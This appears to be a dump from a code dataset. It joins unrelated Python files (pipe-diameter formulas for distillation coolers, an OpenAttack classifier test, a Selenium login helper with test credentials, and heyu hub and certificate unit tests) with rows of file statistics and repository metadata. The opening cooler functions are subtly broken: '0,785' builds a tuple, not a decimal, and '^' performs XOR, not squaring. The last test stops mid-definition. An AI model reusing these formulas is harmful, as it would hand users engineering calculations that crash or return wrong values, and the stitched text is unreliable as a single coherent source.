def d_dist_coolwater(m_coolwater_dist, rho_dist_coolwater, w_liq):
"""
Calculates the tube's diameter of enter and out cooling water to distilliat cooler.
Parameters
----------
m_coolwater_dist : float
The mass flow rate of cooling water, [kg/s]
rho_dist_coolwater : float
The density of cool water, [kg/m**3]
w_liq :float
The speed of liquid at the tube, [m/s]
Returns
-------
d_dist_cooler : float
The tube's diameter of enter and out cooling water to distilliat cooler, [m]
References
----------
&&&
"""
return m_coolwater_dist/(0,785*rho_dist_coolwater*w_liq)
@unitcheck(m_coolwater_dist="kg/s", rho_dist_coolwater ="kg/m**3", d_dist_coolwater_real="m", res_unit="m/s")
def w_dist_coolwater_real(m_coolwater_dist, rho_dist_coolwater , d_dist_coolwater_real):
"""
Calculates the real speed of liquid at the tube.
Parameters
----------
m_coolwater_dist : float
The mass flow rate of cooling water, [kg/s]
rho_dist_coolwater : float
The density of cool water, [kg/m**3]
d_dist_coolwater_real : float
The real tube's diameter, [m]
Returns
-------
w_dist_coolwater_real : float
The real speed of liquid at the tube, [m/s]
References
----------
&&&
"""
return m_coolwater_dist/((d_dist_coolwater_real^2)*rho_dist_coolwater *0,785)
@unitcheck(m_coolwater_waste="kg/s", rho_waste_coolwater="kg/m**3", w_liq="m/s", res_unit="m")
def d_waste_coolwater(m_coolwater_waste, rho_waste_coolwater, w_liq):
"""
Calculates the tube's diameter of enter and out cooling water to waste cooler.
Parameters
----------
m_coolwater_waste : float
The mass flow rate of cooling water, [kg/s]
rho_waste_coolwater : float
The density of cool water, [kg/m**3]
w_liq :float
The speed of liquid at the tube, [m/s]
Returns
-------
d_waste_cooler : float
The tube's diameter of enter and out cooling water to waste cooler, [m]
References
----------
&&&
"""
return m_coolwater_waste/(0,785*rho_waste_coolwater*w_liq)
@unitcheck(m_coolwater_waste="kg/s", rho_waste_coolwater ="kg/m**3", d_waste_coolwater_real="m", res_unit="m/s")
def w_waste_coolwater_real(m_coolwater_waste, rho_waste_coolwater , d_waste_coolwater_real):
"""
Calculates the real speed of liquid at the tube.
Parameters
----------
m_coolwater_waste : float
The mass flow rate of cooling water, [kg/s]
rho_waste_coolwater : float
The density of cool water, [kg/m**3]
d_waste_coolwater_real : float
The real tube's diameter, [m]
Returns
-------
w_waste_coolwater_real : float
The real speed of liquid at the tube, [m/s]
References
----------
&&&
"""
return m_coolwater_waste/((d_waste_coolwater_real^2)*rho_waste_coolwater *0,785)
@unitcheck(m_coolwater_deph="kg/s", rho_deph_coolwater="kg/m**3", w_liq="m/s", res_unit="m")
def d_deph_coolwater(m_coolwater_deph, rho_deph_coolwater, w_liq):
"""
Calculates the tube's diameter of enter and out cooling water to dephlegmator.
Parameters
----------
m_coolwater_deph : float
The mass flow rate of cooling water, [kg/s]
rho_deph_coolwater : float
The density of cool water, [kg/m**3]
w_liq :float
The speed of liquid at the tube, [m/s]
Returns
-------
d_deph_cooler : float
The tube's diameter of enter and out cooling water to dephlegmator, [m]
References
----------
&&&
"""
return m_coolwater_deph/(0,785*rho_deph_coolwater*w_liq)
@unitcheck(m_coolwater_deph="kg/s", rho_deph_coolwater ="kg/m**3", d_deph_coolwater_real="m", res_unit="m/s")
def w_deph_coolwater_real(m_coolwater_deph, rho_deph_coolwater , d_deph_coolwater_real):
"""
Calculates the real speed of liquid at the tube.
Parameters
----------
m_coolwater_deph : float
The mass flow rate of cooling water, [kg/s]
rho_deph_coolwater : float
The density of cool water, [kg/m**3]
d_deph_coolwater_real : float
The real tube's diameter, [m]
Returns
-------
w_deph_coolwater_real : float
The real speed of liquid at the tube, [m/s]
References
----------
&&&
"""
return m_coolwater_deph/((d_deph_coolwater_real^2)*rho_deph_coolwater *0,785)
| 30.906475
| 112
| 0.63047
| 4,060
| 25,776
| 3.742118
| 0.018473
| 0.075824
| 0.018956
| 0.011848
| 0.968209
| 0.937537
| 0.887843
| 0.867636
| 0.851511
| 0.809452
| 0
| 0.013015
| 0.236926
| 25,776
| 833
| 113
| 30.943577
| 0.759418
| 0.579337
| 0
| 0
| 0
| 0
| 0.066331
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.330275
| false
| 0
| 0.009174
| 0
| 0.669725
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
d4388ae280283d39228e7ccff710d2b4b866358c
| 2,656
|
py
|
Python
|
test/test_meta_classifier.py
|
e-tornike/OpenAttack
|
b19c53af2e01f096505f8ebb8f48a54388295003
|
[
"MIT"
] | 444
|
2020-07-14T12:13:26.000Z
|
2022-03-28T02:46:30.000Z
|
test/test_meta_classifier.py
|
e-tornike/OpenAttack
|
b19c53af2e01f096505f8ebb8f48a54388295003
|
[
"MIT"
] | 50
|
2020-07-15T01:34:42.000Z
|
2022-01-24T12:19:19.000Z
|
test/test_meta_classifier.py
|
e-tornike/OpenAttack
|
b19c53af2e01f096505f8ebb8f48a54388295003
|
[
"MIT"
] | 86
|
2020-08-02T13:16:45.000Z
|
2022-03-27T06:22:04.000Z
|
import OpenAttack
import numpy as np
import unittest, os
class MetaClassifier(OpenAttack.Classifier):
def __init__(self):
self.last_meta = None
def get_pred(self, input_):
return self.get_prob(input_)
def get_prob(self, input_):
return self.get_grad([input_], [0])[0]
def get_grad(self, input_, labels):
self.last_meta = self.context.input
return np.array([[1, 2, 3]]), None
class TestMetaClassifier(unittest.TestCase):
def test_get_pred(self):
clsf = MetaClassifier()
self.assertIsNone(clsf.last_meta)
with self.assertRaises(TypeError):
clsf.get_pred("I love apples")
with self.assertRaises(TypeError):
clsf.get_pred()
with self.assertRaises(TypeError):
clsf.get_pred(["I love apples"], "b", "c")
self.assertIsNone(clsf.last_meta)
clsf.set_context({}, None)
clsf.get_pred(["I love apples"])
self.assertDictEqual(clsf.last_meta, {})
clsf.set_context({"THIS": "that"}, None)
clsf.get_pred(["I love apples"])
self.assertDictEqual(clsf.last_meta, {"THIS": "that"})
def test_get_prob(self):
clsf = MetaClassifier()
self.assertIsNone(clsf.last_meta)
with self.assertRaises(TypeError):
clsf.get_prob("I love apples")
with self.assertRaises(TypeError):
clsf.get_prob()
with self.assertRaises(TypeError):
clsf.get_prob(["I love apples"], "b", "c")
self.assertIsNone(clsf.last_meta)
clsf.set_context({}, None)
clsf.get_prob(["I love apples"])
self.assertDictEqual(clsf.last_meta, {})
clsf.set_context({"THIS": "that"}, None)
clsf.get_prob(["I love apples"])
self.assertDictEqual(clsf.last_meta, {"THIS": "that"})
def test_get_grad(self):
clsf = MetaClassifier()
self.assertIsNone(clsf.last_meta)
with self.assertRaises(TypeError):
clsf.get_grad("I love apples")
with self.assertRaises(TypeError):
clsf.get_grad()
with self.assertRaises(TypeError):
clsf.get_grad(["I love apples"])
with self.assertRaises(TypeError):
clsf.get_grad(["I love apples"], "b", "c", "d")
self.assertIsNone(clsf.last_meta)
clsf.set_context({}, None)
clsf.get_grad([["I", "love", "apples"]], [0])
self.assertDictEqual(clsf.last_meta, {})
clsf.set_context({"THIS": "that"}, None)
clsf.get_grad([["I", "love", "apples"]], [0])
self.assertDictEqual(clsf.last_meta, {"THIS": "that"})
| 36.888889
| 62
| 0.602786
| 318
| 2,656
| 4.858491
| 0.147799
| 0.072492
| 0.092557
| 0.187702
| 0.813592
| 0.783819
| 0.783819
| 0.773463
| 0.773463
| 0.726861
| 0
| 0.003532
| 0.253765
| 2,656
| 72
| 63
| 36.888889
| 0.775984
| 0
| 0
| 0.578125
| 0
| 0
| 0.0828
| 0
| 0
| 0
| 0
| 0
| 0.34375
| 1
| 0.109375
| false
| 0
| 0.046875
| 0.03125
| 0.234375
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d46bb22621ea36a7a468068e1f54e396c9d63f24
| 40
|
py
|
Python
|
src/sensors/mock.py
|
space-santa/py-tts
|
e777c97492fdff019e520c39dc27c2eaca38b559
|
[
"Apache-2.0"
] | null | null | null |
src/sensors/mock.py
|
space-santa/py-tts
|
e777c97492fdff019e520c39dc27c2eaca38b559
|
[
"Apache-2.0"
] | null | null | null |
src/sensors/mock.py
|
space-santa/py-tts
|
e777c97492fdff019e520c39dc27c2eaca38b559
|
[
"Apache-2.0"
] | null | null | null |
def get_temperature():
return 12.34
| 13.333333
| 22
| 0.7
| 6
| 40
| 4.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 0.2
| 40
| 2
| 23
| 20
| 0.71875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
00fe8417a234741b8a7c687aa863f8464202f3a4
| 148
|
py
|
Python
|
AI/day03/VCAI/submit/conv2d.py
|
Ersikan/Pool2021
|
cc64658039dee04127a3a641f891781c53647244
|
[
"MIT"
] | 16
|
2021-03-09T10:25:18.000Z
|
2022-02-08T14:29:24.000Z
|
AI/day03/VCAI/submit/conv2d.py
|
Ersikan/Pool2021
|
cc64658039dee04127a3a641f891781c53647244
|
[
"MIT"
] | null | null | null |
AI/day03/VCAI/submit/conv2d.py
|
Ersikan/Pool2021
|
cc64658039dee04127a3a641f891781c53647244
|
[
"MIT"
] | 3
|
2021-02-10T09:32:21.000Z
|
2022-02-01T17:07:59.000Z
|
import numpy
import torch
import torch.nn as nn
import torch.nn.functional as F
import matplotlib.pyplot as plt
# TODO: Create your CNN model here
| 18.5
| 34
| 0.797297
| 26
| 148
| 4.538462
| 0.615385
| 0.279661
| 0.220339
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.162162
| 148
| 7
| 35
| 21.142857
| 0.951613
| 0.216216
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
2e41059737f4d221e7f02145402803f82b9e1f7c
| 2,196
|
py
|
Python
|
tests/MyFuncLogin.py
|
mribrgr/StuRa-Mitgliederdatenbank
|
87a261d66c279ff86056e315b05e6966b79df9fa
|
[
"MIT"
] | 8
|
2019-11-26T13:34:46.000Z
|
2021-06-21T13:41:57.000Z
|
src/tests/MyFuncLogin.py
|
Sumarbrander/Stura-Mitgliederdatenbank
|
691dbd33683b2c2d408efe7a3eb28e083ebcd62a
|
[
"MIT"
] | 93
|
2019-12-16T09:29:10.000Z
|
2021-04-24T12:03:33.000Z
|
src/tests/MyFuncLogin.py
|
Sumarbrander/Stura-Mitgliederdatenbank
|
691dbd33683b2c2d408efe7a3eb28e083ebcd62a
|
[
"MIT"
] | 2
|
2020-12-03T12:43:19.000Z
|
2020-12-22T21:48:47.000Z
|
from django.urls import reverse
def loginAsLukasAdmin(self):
"""
Opens a Browser instance and login as admin with the account testlukasadmin.
:param self:
:type self:
:return: No return Value
"""
# Öffnen eines Browsers
try:
self.browser.get(self.live_server_url)
except BaseException:
print('Error in opening login page')
# Suche aller Objekte der Seite
try:
entUsername = self.browser.find_element_by_id('id_username')
entPassword = self.browser.find_element_by_id('id_password')
btnLogin = self.browser.find_element_by_id('btn-login')
except BaseException:
print("Es wurden nicht alle Objekte auf der Seite gefunden")
# Eingabe der Login-Daten
entUsername.send_keys('testlukasadmin')
entPassword.send_keys('0123456789test')
btnLogin.click()
# Check Login Success
self.assertEqual(
self.browser.current_url,
self.live_server_url +
reverse('mitglieder:homepage'),
msg="Konnte nicht angemeldet werden bzw. Weiterleitung nicht erfolgt")
pass
def loginAsLukasUser(self):
"""
Opens a Browser instance and login as user with the account testlukas.
:param self:
:type self:
:return: No return Value
"""
# Öffnen eines Browsers
try:
self.browser.get(self.live_server_url)
except BaseException:
print('Error in opening login page')
# Suche aller Objekte der Seite
try:
entUsername = self.browser.find_element_by_id('id_username')
entPassword = self.browser.find_element_by_id('id_password')
btnLogin = self.browser.find_element_by_id('btn-login')
except BaseException:
print("Es wurden nicht alle Objekte auf der Seite gefunden")
# Eingabe der Login-Daten
entUsername.send_keys('testlukas')
entPassword.send_keys('0123456789test')
btnLogin.click()
# Check Login Success
self.assertEqual(
self.browser.current_url,
self.live_server_url +
reverse('mitglieder:homepage'),
msg="Konnte nicht angemeldet werden bzw. Weiterleitung nicht erfolgt")
pass
| 28.894737
| 84
| 0.670765
| 259
| 2,196
| 5.548263
| 0.324324
| 0.076548
| 0.06263
| 0.091858
| 0.896312
| 0.896312
| 0.896312
| 0.896312
| 0.847599
| 0.847599
| 0
| 0.012077
| 0.245902
| 2,196
| 75
| 85
| 29.28
| 0.855676
| 0.201275
| 0
| 0.878049
| 0
| 0
| 0.260843
| 0
| 0
| 0
| 0
| 0
| 0.04878
| 1
| 0.04878
| false
| 0.146341
| 0.02439
| 0
| 0.073171
| 0.097561
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
2e5772bada569ca89a06823c22e98d5f3a62822b
| 25,929
|
py
|
Python
|
tests/unit/test_util.py
|
klmitch/heyu
|
9bdc552115bb22d1d01910b0b851eb3cbc3b08d1
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/test_util.py
|
klmitch/heyu
|
9bdc552115bb22d1d01910b0b851eb3cbc3b08d1
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/test_util.py
|
klmitch/heyu
|
9bdc552115bb22d1d01910b0b851eb3cbc3b08d1
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2014 Rackspace
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import ConfigParser
import io
import os
import socket
import unittest
from gevent import ssl
import mock
from heyu import util
class TestException(Exception):
pass
class ParseHubTest(unittest.TestCase):
@mock.patch.object(socket, 'getaddrinfo',
side_effect=lambda a, b, c, d: [(1, 2, 3, '', (a, b))])
def test_space(self, mock_getaddrinfo):
self.assertRaises(util.HubException, util.parse_hub, 'bad hostname')
self.assertFalse(mock_getaddrinfo.called)
@mock.patch.object(socket, 'getaddrinfo',
side_effect=lambda a, b, c, d: [(1, 2, 3, '', (a, b))])
def test_bracket(self, mock_getaddrinfo):
self.assertRaises(util.HubException, util.parse_hub, 'bad[hostname')
self.assertRaises(util.HubException, util.parse_hub, 'bad]hostname')
self.assertRaises(util.HubException, util.parse_hub, '[]')
self.assertFalse(mock_getaddrinfo.called)
@mock.patch.object(socket, 'getaddrinfo',
side_effect=lambda a, b, c, d: [(1, 2, 3, '', (a, b))])
def test_colon(self, mock_getaddrinfo):
self.assertRaises(util.HubException, util.parse_hub, 'bad:hostname')
self.assertRaises(util.HubException, util.parse_hub, 'bad:')
self.assertFalse(mock_getaddrinfo.called)
@mock.patch.object(socket, 'getaddrinfo',
side_effect=lambda a, b, c, d: [(1, 2, 3, '', (a, b))])
def test_bad_ipv6(self, mock_getaddrinfo):
self.assertRaises(util.HubException, util.parse_hub, '::1')
self.assertRaises(util.HubException, util.parse_hub, '[::1')
self.assertRaises(util.HubException, util.parse_hub, '::1]')
self.assertFalse(mock_getaddrinfo.called)
@mock.patch.object(socket, 'getaddrinfo',
side_effect=socket.gaierror(-2, 'Name or service '
'not known'))
def test_unresolvable(self, mock_getaddrinfo):
self.assertRaises(util.HubException, util.parse_hub, 'hostname')
mock_getaddrinfo.assert_called_once_with(
'hostname', util.HEYU_PORT, 0, socket.SOCK_STREAM)
@mock.patch.object(socket, 'getaddrinfo',
side_effect=lambda a, b, c, d: [(1, 2, 3, '', (a, b))])
def test_bare_hostname(self, mock_getaddrinfo):
result = util.parse_hub('hostname')
self.assertEqual(('hostname', util.HEYU_PORT), result)
mock_getaddrinfo.assert_called_once_with(
'hostname', util.HEYU_PORT, 0, socket.SOCK_STREAM)
@mock.patch.object(socket, 'getaddrinfo',
side_effect=lambda a, b, c, d: [(1, 2, 3, '', (a, b))])
def test_hostname_with_port(self, mock_getaddrinfo):
result = util.parse_hub('hostname:1234')
self.assertEqual(('hostname', 1234), result)
mock_getaddrinfo.assert_called_once_with(
'hostname', 1234, 0, socket.SOCK_STREAM)
@mock.patch.object(socket, 'getaddrinfo',
side_effect=lambda a, b, c, d: [(1, 2, 3, '', (a, b))])
def test_bare_ipv4(self, mock_getaddrinfo):
result = util.parse_hub('127.0.0.1')
self.assertEqual(('127.0.0.1', util.HEYU_PORT), result)
mock_getaddrinfo.assert_called_once_with(
'127.0.0.1', util.HEYU_PORT, 0, socket.SOCK_STREAM)
@mock.patch.object(socket, 'getaddrinfo',
side_effect=lambda a, b, c, d: [(1, 2, 3, '', (a, b))])
def test_ipv4_with_port(self, mock_getaddrinfo):
result = util.parse_hub('127.0.0.1:1234')
self.assertEqual(('127.0.0.1', 1234), result)
mock_getaddrinfo.assert_called_once_with(
'127.0.0.1', 1234, 0, socket.SOCK_STREAM)
@mock.patch.object(socket, 'getaddrinfo',
side_effect=lambda a, b, c, d: [(1, 2, 3, '', (a, b))])
def test_bare_ipv6(self, mock_getaddrinfo):
result = util.parse_hub('[::1]')
self.assertEqual(('::1', util.HEYU_PORT), result)
mock_getaddrinfo.assert_called_once_with(
'::1', util.HEYU_PORT, 0, socket.SOCK_STREAM)
@mock.patch.object(socket, 'getaddrinfo',
side_effect=lambda a, b, c, d: [(1, 2, 3, '', (a, b))])
def test_ipv6_with_port(self, mock_getaddrinfo):
result = util.parse_hub('[::1]:1234')
self.assertEqual(('::1', 1234), result)
mock_getaddrinfo.assert_called_once_with(
'::1', 1234, 0, socket.SOCK_STREAM)
class DefaultHubTest(unittest.TestCase):
@mock.patch('os.path.expanduser', return_value='/home/user/.heyu.hub')
@mock.patch('__builtin__.open', side_effect=IOError())
@mock.patch.object(util, 'parse_hub', return_value=('1.2.3.4', 1234))
def test_no_hub_file(self, mock_parse_hub, mock_open, mock_expanduser):
result = util.default_hub()
self.assertEqual(('127.0.0.1', util.HEYU_PORT), result)
mock_open.assert_called_once_with('/home/user/.heyu.hub')
self.assertFalse(mock_parse_hub.called)
@mock.patch('os.path.expanduser', return_value='/home/user/.heyu.hub')
@mock.patch('__builtin__.open', return_value=io.BytesIO('hub\n'))
@mock.patch.object(util, 'parse_hub', side_effect=util.HubException())
def test_no_hub_resolv(self, mock_parse_hub, mock_open, mock_expanduser):
result = util.default_hub()
self.assertEqual(('127.0.0.1', util.HEYU_PORT), result)
mock_open.assert_called_once_with('/home/user/.heyu.hub')
mock_parse_hub.assert_called_once_with('hub')
@mock.patch('os.path.expanduser', return_value='/home/user/.heyu.hub')
@mock.patch('__builtin__.open', return_value=io.BytesIO('hub\n'))
@mock.patch.object(util, 'parse_hub', return_value=('1.2.3.4', 1234))
def test_default_hub(self, mock_parse_hub, mock_open, mock_expanduser):
result = util.default_hub()
self.assertEqual(('1.2.3.4', 1234), result)
mock_open.assert_called_once_with('/home/user/.heyu.hub')
mock_parse_hub.assert_called_once_with('hub')
class OutgoingEndpointTest(unittest.TestCase):
@mock.patch('tendril.addr_info', return_value=socket.AF_INET)
def test_ipv4(self, mock_addr_info):
result = util.outgoing_endpoint('target')
self.assertEqual(('', 0), result)
mock_addr_info.assert_called_once_with('target')
@mock.patch('tendril.addr_info', return_value=socket.AF_INET6)
def test_ipv6(self, mock_addr_info):
result = util.outgoing_endpoint('target')
self.assertEqual(('::', 0), result)
mock_addr_info.assert_called_once_with('target')
class CertWrapperTest(unittest.TestCase):
@mock.patch('os.path.expanduser', return_value='/home/dir/.heyu.cert')
@mock.patch('ConfigParser.SafeConfigParser', return_value=mock.Mock(**{
'read.return_value': [],
'items.return_value': [],
}))
@mock.patch('tendril.TendrilPartial', return_value='wrapper')
def test_insecure(self, mock_TendrilPartial, mock_SafeConfigParser,
mock_expanduser):
result = util.cert_wrapper(None, 'test', secure=False)
self.assertEqual(None, result)
self.assertFalse(mock_expanduser.called)
self.assertFalse(mock_SafeConfigParser.called)
self.assertFalse(mock_TendrilPartial.called)
@mock.patch('os.path.expanduser', return_value='/home/dir/.heyu.cert')
@mock.patch('ConfigParser.SafeConfigParser', return_value=mock.Mock(**{
'read.return_value': [],
'items.return_value': [],
}))
@mock.patch('tendril.TendrilPartial', return_value='wrapper')
def test_missing_conf(self, mock_TendrilPartial, mock_SafeConfigParser,
mock_expanduser):
cp = mock_SafeConfigParser.return_value
self.assertRaises(util.CertException, util.cert_wrapper, None, 'test')
mock_expanduser.assert_called_once_with('~/.heyu.cert')
mock_SafeConfigParser.assert_called_once_with()
cp.read.assert_called_once_with('/home/dir/.heyu.cert')
self.assertFalse(cp.items.called)
self.assertFalse(mock_TendrilPartial.called)
@mock.patch('os.path.expanduser', return_value='/home/dir/.heyu.cert')
@mock.patch('ConfigParser.SafeConfigParser', return_value=mock.Mock(**{
'read.return_value': [],
'items.return_value': [],
}))
@mock.patch('tendril.TendrilPartial', return_value='wrapper')
def test_bad_conf(self, mock_TendrilPartial, mock_SafeConfigParser,
mock_expanduser):
cp = mock_SafeConfigParser.return_value
self.assertRaises(util.CertException, util.cert_wrapper,
'bad[file', 'test')
self.assertFalse(mock_expanduser.called)
self.assertFalse(mock_SafeConfigParser.called)
self.assertFalse(cp.items.called)
self.assertFalse(mock_TendrilPartial.called)
@mock.patch('os.path.expanduser', return_value='/home/dir/.heyu.cert')
@mock.patch('ConfigParser.SafeConfigParser', return_value=mock.Mock(**{
'read.return_value': ['/home/dir/.heyu.cert'],
'items.side_effect': ConfigParser.NoSectionError('test'),
}))
@mock.patch('tendril.TendrilPartial', return_value='wrapper')
def test_missing_profile(self, mock_TendrilPartial, mock_SafeConfigParser,
mock_expanduser):
cp = mock_SafeConfigParser.return_value
self.assertRaises(util.CertException, util.cert_wrapper, None, 'test')
mock_expanduser.assert_called_once_with('~/.heyu.cert')
mock_SafeConfigParser.assert_called_once_with()
cp.read.assert_called_once_with('/home/dir/.heyu.cert')
cp.items.assert_called_once_with('test')
self.assertFalse(mock_TendrilPartial.called)
@mock.patch('os.path.expanduser', return_value='/home/dir/.heyu.cert')
@mock.patch('ConfigParser.SafeConfigParser', return_value=mock.Mock(**{
'read.return_value': ['/home/dir/.heyu.cert'],
'items.side_effect': TestException('test'),
}))
@mock.patch('tendril.TendrilPartial', return_value='wrapper')
def test_unloadable_profile(self, mock_TendrilPartial,
mock_SafeConfigParser, mock_expanduser):
cp = mock_SafeConfigParser.return_value
self.assertRaises(util.CertException, util.cert_wrapper, None, 'test')
mock_expanduser.assert_called_once_with('~/.heyu.cert')
mock_SafeConfigParser.assert_called_once_with()
cp.read.assert_called_once_with('/home/dir/.heyu.cert')
cp.items.assert_called_once_with('test')
self.assertFalse(mock_TendrilPartial.called)
@mock.patch('os.path.expanduser', return_value='/home/dir/.heyu.cert')
@mock.patch('ConfigParser.SafeConfigParser', return_value=mock.Mock(**{
'read.return_value': ['/home/dir/.heyu.cert'],
'items.return_value': [('cafile', 'ca'), ('certfile', 'cert')],
}))
@mock.patch('tendril.TendrilPartial', return_value='wrapper')
def test_missing_keyfile(self, mock_TendrilPartial, mock_SafeConfigParser,
mock_expanduser):
cp = mock_SafeConfigParser.return_value
self.assertRaises(util.CertException, util.cert_wrapper, None, 'test')
mock_expanduser.assert_called_once_with('~/.heyu.cert')
mock_SafeConfigParser.assert_called_once_with()
cp.read.assert_called_once_with('/home/dir/.heyu.cert')
cp.items.assert_called_once_with('test')
self.assertFalse(mock_TendrilPartial.called)
@mock.patch('os.path.expanduser', return_value='/home/dir/.heyu.cert')
@mock.patch('ConfigParser.SafeConfigParser', return_value=mock.Mock(**{
'read.return_value': ['/home/dir/.heyu.cert'],
'items.return_value': [('keyfile', 'key'), ('certfile', 'cert')],
}))
@mock.patch('tendril.TendrilPartial', return_value='wrapper')
def test_missing_cafile(self, mock_TendrilPartial, mock_SafeConfigParser,
mock_expanduser):
cp = mock_SafeConfigParser.return_value
self.assertRaises(util.CertException, util.cert_wrapper, None, 'test')
mock_expanduser.assert_called_once_with('~/.heyu.cert')
mock_SafeConfigParser.assert_called_once_with()
cp.read.assert_called_once_with('/home/dir/.heyu.cert')
cp.items.assert_called_once_with('test')
self.assertFalse(mock_TendrilPartial.called)
@mock.patch('os.path.expanduser', return_value='/home/dir/.heyu.cert')
@mock.patch('ConfigParser.SafeConfigParser', return_value=mock.Mock(**{
'read.return_value': ['/home/dir/.heyu.cert'],
'items.return_value': [('cafile', 'ca'), ('keyfile', 'key')],
}))
@mock.patch('tendril.TendrilPartial', return_value='wrapper')
def test_missing_certfile(self, mock_TendrilPartial, mock_SafeConfigParser,
mock_expanduser):
cp = mock_SafeConfigParser.return_value
self.assertRaises(util.CertException, util.cert_wrapper, None, 'test')
mock_expanduser.assert_called_once_with('~/.heyu.cert')
mock_SafeConfigParser.assert_called_once_with()
cp.read.assert_called_once_with('/home/dir/.heyu.cert')
cp.items.assert_called_once_with('test')
self.assertFalse(mock_TendrilPartial.called)
@mock.patch('os.path.expanduser', return_value='/home/dir/.heyu.cert')
@mock.patch('ConfigParser.SafeConfigParser', return_value=mock.Mock(**{
'read.return_value': ['/home/dir/.heyu.cert'],
'items.return_value': [
('cafile', 'ca'),
('keyfile', 'key'),
('certfile', 'cert'),
],
}))
@mock.patch('tendril.TendrilPartial', return_value='wrapper')
def test_basic(self, mock_TendrilPartial, mock_SafeConfigParser,
mock_expanduser):
cp = mock_SafeConfigParser.return_value
result = util.cert_wrapper(None, 'test')
self.assertEqual(result, 'wrapper')
mock_expanduser.assert_called_once_with('~/.heyu.cert')
mock_SafeConfigParser.assert_called_once_with()
cp.read.assert_called_once_with('/home/dir/.heyu.cert')
cp.items.assert_called_once_with('test')
mock_TendrilPartial.assert_called_once_with(
ssl.wrap_socket, keyfile='key', certfile='cert', ca_certs='ca',
server_side=False, cert_reqs=ssl.CERT_REQUIRED,
ssl_version=ssl.PROTOCOL_TLSv1)
@mock.patch('os.path.expanduser', return_value='/home/dir/.heyu.cert')
@mock.patch('ConfigParser.SafeConfigParser', return_value=mock.Mock(**{
'read.return_value': ['/home/dir/.heyu.cert'],
'items.return_value': [
('cafile', 'ca'),
('keyfile', 'key'),
('certfile', 'cert'),
],
}))
@mock.patch('tendril.TendrilPartial', return_value='wrapper')
def test_server(self, mock_TendrilPartial, mock_SafeConfigParser,
mock_expanduser):
cp = mock_SafeConfigParser.return_value
result = util.cert_wrapper(None, 'test', True)
self.assertEqual(result, 'wrapper')
mock_expanduser.assert_called_once_with('~/.heyu.cert')
mock_SafeConfigParser.assert_called_once_with()
cp.read.assert_called_once_with('/home/dir/.heyu.cert')
cp.items.assert_called_once_with('test')
mock_TendrilPartial.assert_called_once_with(
ssl.wrap_socket, keyfile='key', certfile='cert', ca_certs='ca',
server_side=True, cert_reqs=ssl.CERT_REQUIRED,
ssl_version=ssl.PROTOCOL_TLSv1)
@mock.patch('os.path.expanduser', return_value='/home/dir/.heyu.cert')
@mock.patch('ConfigParser.SafeConfigParser', return_value=mock.Mock(**{
'read.return_value': ['/home/dir/.heyu.cert'],
'items.return_value': [
('cafile', 'ca'),
('keyfile', 'key'),
('certfile', 'cert'),
],
}))
@mock.patch('tendril.TendrilPartial', return_value='wrapper')
def test_alt_conf(self, mock_TendrilPartial, mock_SafeConfigParser,
mock_expanduser):
cp = mock_SafeConfigParser.return_value
result = util.cert_wrapper('alt_conf', 'test')
self.assertEqual(result, 'wrapper')
mock_expanduser.assert_called_once_with('alt_conf')
mock_SafeConfigParser.assert_called_once_with()
cp.read.assert_called_once_with('/home/dir/.heyu.cert')
cp.items.assert_called_once_with('test')
mock_TendrilPartial.assert_called_once_with(
ssl.wrap_socket, keyfile='key', certfile='cert', ca_certs='ca',
server_side=False, cert_reqs=ssl.CERT_REQUIRED,
ssl_version=ssl.PROTOCOL_TLSv1)
@mock.patch('os.path.expanduser', return_value='/home/dir/.heyu.cert')
@mock.patch('ConfigParser.SafeConfigParser', return_value=mock.Mock(**{
'read.return_value': ['/home/dir/.heyu.cert'],
'items.return_value': [
('cafile', 'ca'),
('keyfile', 'key'),
('certfile', 'cert'),
],
}))
@mock.patch('tendril.TendrilPartial', return_value='wrapper')
def test_alt_profile(self, mock_TendrilPartial, mock_SafeConfigParser,
mock_expanduser):
